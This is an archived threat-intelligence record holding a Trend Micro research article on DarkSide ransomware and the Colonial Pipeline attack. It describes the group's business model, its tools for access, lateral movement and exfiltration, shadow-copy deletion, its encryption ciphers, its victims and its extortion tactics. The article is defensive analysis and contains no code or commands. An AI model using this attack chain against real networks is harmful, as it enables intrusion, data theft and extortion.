{
	"id": "f5ebcad9-2975-4a41-822d-7db842864e14",
	"created_at": "2026-04-06T00:13:14.128248Z",
	"updated_at": "2026-04-10T03:20:05.303035Z",
	"deleted_at": null,
	"sha1_hash": "706e08c14dec2b95be3830c4cfd5614127c837b2",
	"title": "What We Know About Darkside Ransomware and the US Pipeline Attack",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 985025,
	"plain_text": "What We Know About Darkside Ransomware and the US Pipeline\r\nAttack\r\nBy Trend Micro Research ( words)\r\nPublished: 2021-05-12 · Archived: 2026-04-05 23:11:15 UTC\r\nUpdated May 17, 2021, 3:25 a.m. Eastern Time: This article has been updated to add references to the\r\nDarkSide victim data.\r\nOn May 7, a ransomware attack forced Colonial Pipelineopen on a new tab, a company responsible for nearly half\r\nthe fuel supply for the US East Coast, to proactively shut down operations. Stores of gasoline, diesel, home\r\nheating oil, jet fuel, and military supplies had been so heavily affected that the Federal Motor Carrier Safety\r\nAdministration (FMCSA) declared a state of emergencyopen on a new tab in 18 states to help with the shortages.\r\nIt has been five days since the shutdown prompted by the attack, but Colonial Pipeline is still unable to resume\r\nfull operations. Outages have already started affecting motorists. In metro Atlanta, 30% of gas stations are without\r\ngasolineopen on a new tab, and other cities are reporting similar numbers. To keep supplies intact for essential\r\nservices, the US government has issued advisories against hoardingopen on a new tab. \r\nThe FBI has confirmed that DarkSide, a cybercriminal group believed to have originated in Eastern Europe, is\r\nbehind the attackopen on a new tab. The ransomware used by the group is a relatively new family that was first\r\nspotted in August 2020, but the group draws on experience from previous financially successful cybercrime\r\nenterprises.\r\nApart from locking Colonial Pipeline’s computer systems, DarkSideopen on a new tab also stole over 100 GB of\r\ncorporate dataopen on a new tab. This data theft is all the more relevant in light of the fact that the group has a\r\nhistory of doubly extorting its victims — not only asking for money to unlock the affected computers and\r\ndemanding payment for the captured data, but also threatening to leak the stolen data if the victims do not pay. As\r\nwe will cover later, DarkSide shows a level of innovation that sets it apart from its competition, being one of the\r\nfirst to offer what we call “quadruple extortion services.”\r\nThe group announced on May 12 that it had three more victimsopen on a new tab: a construction company based\r\nin Scotland, a renewable energy product reseller in Brazil, and a technology services reseller in the US. The\r\nDarkSide actors claimed to have stolen a total of 1.9 GB of data from these companies, including sensitive\r\ninformation such as client data, financial data, employee passports, and contracts.   \r\nSince Darkside is a ransomware-as-a-service (RaaS)open on a new tab, it is possible that three different affiliate\r\ngroups are behind these three attacks. Even the DarkSide actors themselves admit that they just buy access to\r\ncompany networksopen on a new tab — they have no idea how access was acquired.\r\nTrend Micro Research found dozens of DarkSide ransomware samples in the wild and investigated how the\r\nransomware group operates and what organizations it typically targets. \r\nhttps://www.trendmicro.com/en_us/research/21/e/what-we-know-about-darkside-ransomware-and-the-us-pipeline-attac.html\r\nPage 1 of 6\n\nThe DarkSide ransomware\r\nDarkSide offers its RaaS to affiliates for a percentage of the profits. The group presents a prime example of\r\nmodern ransomware, operating with a more advanced business model. Modern ransomware identifies high-value\r\ntargets and involves more precise monetization of compromised assets (with double extortion as an example).\r\nModern ransomware attacks are also typically done by several groups who collaborate and split profits. These\r\nattacks may look more like advanced persistent threat (APT) attacks than traditional ransomware events.  \r\nHere is a short timeline of DarkSide activity compiled from publicly available reports:\r\n August 2020: DarkSide introduces its ransomware.\r\nOctober 2020: DarkSide donates US$20,000 stolen from victims to charity.\r\nNovember 2020: DarkSide establishes its RaaS model. The group invites other criminals to use its service.\r\nA DarkSide data leak site is later discovered.\r\nNovember 2020: DarkSide launches its content delivery network (CDN) for storing and delivering\r\ncompromised data.\r\nDecember 2020: A DarkSide actor invites media outlets and data recovery organizations to follow the\r\ngroup’s press centeropen on a new tab on the public leak site.\r\nMarch 2021: DarkSide releases version 2.0 of its ransomware with several updates.\r\nMay 2021: DarkSide launches the Colonial Pipeline attack. After the attack, Darkside announces it is\r\napolitical and will start vetting its targets (possibly to avoid raising attention to future attacks).\r\nInitial access\r\nIn our analysis of DarkSide samples, we saw that phishing, remote desktop protocol (RDP) abuse, and exploiting\r\nknown vulnerabilities are the tactics used by the group to gain initial access. The group also uses common,\r\nlegitimate toolsnews- cybercrime-and-digital-threats throughout the attack process to remain undetected and\r\nobfuscate its attack. \r\nThroughout the reconnaissance and gaining-entry phases, we saw these legitimate tools used for specific purposes:\r\nPowerShell: for reconnaissance and persistence\r\nMetasploit Framework: for reconnaissance\r\nMimikatz: for reconnaissance\r\nBloodHound: for reconnaissance\r\nCobalt Strike: for installation\r\nFor modern ransomware like DarkSide, gaining initial access no longer immediately leads to ransomware being\r\ndropped. There are now several steps in between that are manually executed by an attacker.\r\nLateral movement and privilege escalation\r\nLateral movement is a key discovery phase in the modern ransomware process. In general, the goal is to identify\r\nall critical data within the victim organization, including the target files and locations for the upcoming exfiltration\r\nand encryption steps.\r\nhttps://www.trendmicro.com/en_us/research/21/e/what-we-know-about-darkside-ransomware-and-the-us-pipeline-attac.html\r\nPage 2 of 6\n\nIn the case of DarkSide, we confirmed reports that the goal of lateral movement is to gain Domain Controller\r\n(DC)open on a new tab or Active Directory access, which will be used to steal credentials, escalate privileges, and\r\nacquire other valuable assets for data exfiltration. The group then continues its lateral movement through the\r\nsystem, eventually using the DC network share to deploy the ransomware to connected machines. Some of the\r\nknown lateral movement methods deployed by DarkSide use PSExec and RDP. But as we previously noted, a\r\nmodern ransomware group behaves with methods more commonly associated with APT groups — it adapts its\r\ntooling and methods to the victim’s network defenses.\r\nExfiltration\r\nAs is common practice with double extortion ransomware, critical files are exfiltrated prior to the ransomware\r\nbeing launched. This is the riskiest step so far in the ransomware execution process, as data exfiltration is more\r\nlikely to be noticed by the victim organization’s security team. It is the last step before the ransomware is dropped,\r\nand the attack often speeds up at this point to complete the process before it is stopped.\r\nFor exfiltration, we saw the following tools being used:\r\n7-Zip: a utility used for archiving files in preparation for exfiltration\r\nRclone and Mega client: tools used for exfiltrating files to cloud storage\r\nPuTTy: an alternative application used for network file transfer\r\nDarkSide uses several Tor-based leak sitesopen on a new tab to host stolen data. The file-sharing servicesopen on\r\na new tab used by the group for data exfiltration include Mega and PrivatLab.\r\nExecution and impact\r\nThe execution of the actual ransomware occurs next. The DarkSide ransomware shares many similarities with\r\nREvil in this step of the process, including the structure of ransom notes and the use of PowerShell to execute a\r\ncommand that deletes shadow copies from the network. It also uses the same code to check that the victim is not\r\nlocated in a Commonwealth of Independent States (CIS) country.\r\nIn addition to PowerShell, which is used to install and operate the malware itself, the group reportedly uses\r\nCertutil and Bitsadminopen on a new tab to download the ransomware. It uses two encryption methods, depending\r\non whether the target operating system is Windows or Linux: A ChaCha20 stream cipher with RSA-4096 is used\r\non Linux, and Salsa20 with RSA-1024 is used on Windows.\r\nThe following figure shows a sample ransom note from DarkSide.\r\nIt is interesting to note that DarkSide’s ransom note is similar to that of Babuk, which might indicate that these\r\ntwo families share a link.\r\nDarkSide ransomware targets\r\nBased on the group’s Tor leak sites, DarkSide determines whether to pursue targeting a potential victim\r\norganization by primarily looking at that organization’s financial records. It also uses this information to\r\ndetermine the amount of ransom to demand, with a typical ransom demand amounting to anywhere between\r\nUS$200,000 and US$2 millionopen on a new tab.\r\nhttps://www.trendmicro.com/en_us/research/21/e/what-we-know-about-darkside-ransomware-and-the-us-pipeline-attac.html\r\nPage 3 of 6\n\nReportsopen on a new tab say that, based on the leak sites, there are at least 90 victims affected by DarkSide. In\r\ntotal, more than 2 TB of stolen data is currently being hosted on DarkSide sites, and 100% of victims’ stolen files\r\nare leaked.\r\nThe actors behind Darkside have stated that they avoid targeting companies in certain industries, including\r\nhealthcare, education, the public sector, and the nonprofit sector. Organizations in manufacturing, finance, and\r\ncritical infrastructure have been identified in Trend Micro data as targets.\r\nBased on Trend Micro data, the US is by far DarkSide’s most targeted country, at more than 500 detections,\r\nfollowed by France, Belgium, and Canada. As previously mentioned, DarkSide avoids victimizing companies in\r\nCIS countries. Part of the ransomware execution code checks for the geolocation of potential victims to avoid\r\ncompanies in these countries, although the group would likely be aware of the location of a target organization\r\nlong before the ransomware is executed. That the group admittedly spares companies in CIS countries could be a\r\nclue to where DarkSide actors are residing. It is possible that they do this to avoid law enforcement action from\r\nthese countries, since the governments of some of these countries do not persecute criminal acts such as\r\nDarkSide’s if they are done on foreign targets.\r\nAfter the Colonial Pipeline attack, DarkSide released a statement on one of its leak sites clarifying that the group\r\ndid not wish to create problems for society and that its goal was simply to make money. There is no way to verify\r\nthis statement, but we know that the group is still quite active. As previously mentioned, DarkSide actors\r\nannounced that they had stolen data from three more victims since the Colonial Pipeline attack.\r\nMITRE ATT\u0026CK tactics and techniques\r\nThe following are the MITRE ATT\u0026CK tactics and techniques associated with DarkSide.\r\nhttps://www.trendmicro.com/en_us/research/21/e/what-we-know-about-darkside-ransomware-and-the-us-pipeline-attac.html\r\nPage 4 of 6\n\nConclusion\r\nRansomware is an old but persistently evolving threat. As demonstrated by the recent activities of DarkSide,\r\nmodern ransomware has changed in many aspects: bigger targets, more advanced extortion techniques, and\r\nfarther-reaching consequences beyond the victims themselves. \r\nRansomware actors are no longer content with simply locking companies out of their computers and asking for\r\nransom. Now they are digging deeper into their victims’ networks and looking for new ways to monetize their\r\nactivities. For example, a compromised cloud server can go through a complete attack life cycleopen on a new tab,\r\nfrom the initial compromise to data exfiltration to resale or use for further monetization. Compromised enterprise\r\nassets are a lucrative commodity on underground markets; cybercriminals are well aware of how to make money\r\nfrom attacking company serversnews- cybercrime-and-digital-threats. \r\nIn the Colonial Pipeline attack, DarkSide used double extortion. But some ransomware actors have gone even\r\nfurther. Jon Clay, Director of Global Threat Communications at Trend Micro, outlines the phases of ransomware:\r\nPhase 1: Just ransomware. Encrypt the files, drop the ransom note, and wait for the payment.\r\nPhase 2: Double extortion. Phase 1 + data exfiltration and threatening data release. Mazeopen on a new tab\r\nwas one of the first documented cases of this.\r\nPhase 3: Triple extortion. Phase 1 + Phase 2 + threatening DDoS. SunCrypt, RagnarLocker, and\r\nAvaddonopen on a new tab were among the first groups documented doing this.\r\nPhase 4: Quadruple extortion. Phase 1 (+ possibly Phase 2 or Phase 3) + directly emailing the victim’s\r\ncustomer base or having contracted call centers contact customers.\r\nhttps://www.trendmicro.com/en_us/research/21/e/what-we-know-about-darkside-ransomware-and-the-us-pipeline-attac.html\r\nPage 5 of 6\n\nIn fact, as detailed in security reportsopen on a new tab, DarkSide offers both the DDoS and call center options.\r\nThe group is making quadruple extortion available to its affiliates and showing a clear sign of innovation. In\r\ncybercrime, there are no copyright or patent laws for tools and techniques. Innovation is as much about quickly\r\nand completely copying others’ best practices as it is about coming up with new approaches. \r\nRansomware will only continue to evolve. Organizations therefore need to take the time to put in place an incident\r\nresponse plan focused on the new model of ransomware attacks. Unfortunately, some organizations may be\r\nputting cybersecurity on the back burner. For example, some security expertsopen on a new tab noted that\r\nColonial Pipeline was using a previously exploited vulnerable version of Microsoft Exchange, among other\r\ncybersecurity lapses. A successful attack on a company providing critical services will have rippling effects that\r\nwill harm multiple sectors of society, which is why protecting these services should be a top priority.\r\nIn a US Senate hearing on cybersecurity threats, Senator Rob Portman of Ohio described the strike on Colonial\r\nPipelineopen on a new tab as “potentially the most substantial and damaging attack on US critical infrastructure\r\never.” This attack is a call to action for all organizations to harden their networks against attacks and improve their\r\nnetwork visibility.\r\nTrend Micro has a multilayered cybersecurity platform that can help improve your organization’s detection and\r\nresponse against the latest ransomware attacks and improve your organization’s visibility. Visit the Trend Micro\r\nVision One™products website for more information. Detailed solutions can be found in our knowledge base\r\narticle on DarkSide ransomwareopen on a new tab.\r\nSource: https://www.trendmicro.com/en_us/research/21/e/what-we-know-about-darkside-ransomware-and-the-us-pipeline-attac.html\r\nhttps://www.trendmicro.com/en_us/research/21/e/what-we-know-about-darkside-ransomware-and-the-us-pipeline-attac.html\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/21/e/what-we-know-about-darkside-ransomware-and-the-us-pipeline-attac.html"
	],
	"report_names": [
		"what-we-know-about-darkside-ransomware-and-the-us-pipeline-attac.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434394,
	"ts_updated_at": 1775791205,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/706e08c14dec2b95be3830c4cfd5614127c837b2.pdf",
		"text": "https://archive.orkl.eu/706e08c14dec2b95be3830c4cfd5614127c837b2.txt",
		"img": "https://archive.orkl.eu/706e08c14dec2b95be3830c4cfd5614127c837b2.jpg"
	}
}